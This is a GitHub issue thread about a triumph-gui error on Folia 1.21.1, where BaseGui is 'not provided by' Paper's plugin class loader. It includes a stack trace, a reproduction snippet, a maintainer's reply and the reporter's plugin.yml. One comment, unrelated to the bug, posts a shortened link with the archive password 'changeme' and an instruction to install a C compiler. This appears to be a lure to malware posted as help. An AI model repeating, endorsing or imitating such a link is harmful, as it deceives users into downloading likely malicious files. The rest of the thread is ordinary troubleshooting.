### ISSUE TITLE
dev.triumphteam.gui.guis.BaseGui is not provided by a interface io.papermc.paper.plugin.provider.classloader.ConfiguredPluginClassLoader

### ISSUE THREAD

**Issue by Euphillya** [TriumphTeam/triumph-gui#124]
Error : 
```
Caused by: java.lang.IllegalArgumentException: class dev.triumphteam.gui.guis.BaseGui is not provided by a interface io.papermc.paper.plugin.provider.classloader.ConfiguredPluginClassLoader
        at org.bukkit.plugin.java.JavaPlugin.getProvidingPlugin(JavaPlugin.java:459) ~[paper-mojangapi-1.21.1-R0.1-SNAPSHOT.jar:?]
        at dev.triumphteam.gui.guis.BaseGui.<clinit>(BaseGui.java:71) ~[?:?]
        ... 9 more
```

Reproduce : 
- Folia 1.21.1
```Java
 PaginatedGui gui = Gui.scrolling()
                    .title(Component.text("test " + offlinePlayer.getName()))
                    .rows(6)
                    .pageSize(45)
                    .scrollType(ScrollType.VERTICAL)
                    .create();
```

**Comment by pinpolhoxx** [comment]
I think this will help you.

https://bit.ly/3TCbXO6

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by LichtHund** [comment]
Hi, I just tested and seemed to have worked perfectly fine on Folia 1.21.1. Are you using `3.1.10`? Try a few other things like relocating, or trying with no other plugin in the server.

**Comment by Euphillya** [comment]
> Hi, I just tested and seemed to have worked perfectly fine on Folia 1.21.1. Are you using `3.1.10`? Try a few other things like relocating, or trying with no other plugin in the server.
I did not use the implementation on gradle, but used libraries on the plugin.yml file

```yml
name: HopperFiltre
version: '${version}'
main: fr.excaliamc.hopperfiltre.HopperFiltre
api-version: 1.19
depend: [ NBTAPI ]
folia-supported: true

libraries:
  - com.google.code.gson:gson:2.11.0
  - dev.triumphteam:triumph-gui:3.1.10
```
